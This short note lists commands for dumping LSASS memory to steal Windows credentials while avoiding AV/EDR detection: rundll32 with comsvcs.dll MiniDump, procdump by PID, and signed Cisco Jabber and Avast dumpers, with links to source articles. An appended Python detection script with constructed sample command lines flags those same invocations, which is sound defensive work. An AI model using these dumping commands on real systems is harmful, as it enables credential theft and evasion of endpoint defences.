
A few techniques to avoid AV or EDR detection

rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"

procdump : pass the process ID (<process id>) instead of the word lsass

Signed executables that can also be used:

CiscoJabber : CiscoJabberProcessDump.exe (ps lsass).id c:\temp\lsass.dmp

See original article : https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

Avast Dumper : AvDump.exe --pid 676 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file E:\lsass.dmp --min_interval 0

See original article : https://www.archcloudlabs.com/projects/dumping-memory-with-av/
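
Added example (not from the original post or the linked articles): detection logic in Python that classifies process-creation command lines for the four tools listed above without relying on the string lsass. The rule names, the PID-to-image table and the sample command lines are constructed for illustration; it assumes command-line logging plus a process snapshot from the same host.

```python
import re

# Rules key on the tool and its dump arguments, never on the string "lsass",
# because the commands above pass a PID (or a shell expression that becomes one).
RULES = [
    ("comsvcs_minidump", re.compile(r"rundll32(\.exe)?\b.*\bcomsvcs(\.dll)?\b.*\bMiniDump\b", re.I)),
    ("procdump_by_pid", re.compile(r"\bprocdump(64)?(\.exe)?\b.*\s\d+(\s|$)", re.I)),
    ("jabber_processdump", re.compile(r"\bCiscoJabberProcessDump(\.exe)?\b", re.I)),
    # Accept "-", "--" and the en-dash that some page renderers substitute.
    ("avdump_dump_file", re.compile(r"\bAvDump(\.exe)?\b.*[-\u2013]{1,2}dump_file\b", re.I)),
]
# Standalone integers only: skips digits inside names such as "system32".
INT = re.compile(r"(?<![\w.\\:])\d+(?![\w.\\:])")

def classify(cmdline, pid_names):
    """Return (rule, severity) for a process-creation command line, or None."""
    for name, rx in RULES:
        if rx.search(cmdline):
            pids = [int(n) for n in INT.findall(cmdline)]
            hits_lsass = any(pid_names.get(p, "").lower() == "lsass.exe" for p in pids)
            return name, ("high" if hits_lsass else "medium")
    return None

# Constructed process snapshot and constructed command lines (not real logs).
PID_NAMES = {624: "lsass.exe", 4312: "w3wp.exe"}
SAMPLE = [
    r'rundll32 C:\windows\system32\comsvcs.dll MiniDump "624 dump.bin full"',
    r'procdump.exe -accepteula -ma 624 C:\temp\out.dmp',
    r'procdump.exe -ma 4312 C:\temp\app.dmp',
    r'CiscoJabberProcessDump.exe 624 c:\temp\out.dmp',
    r'AvDump.exe --pid 624 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file E:\out.dmp --min_interval 0',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
]

if __name__ == "__main__":
    for cmd in SAMPLE:
        print(classify(cmd, PID_NAMES), cmd)
```

Command-line rules depend on the image name; process-access telemetry targeting lsass.exe (for example Sysmon Event ID 10) covers the same behaviour independent of the tool used.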
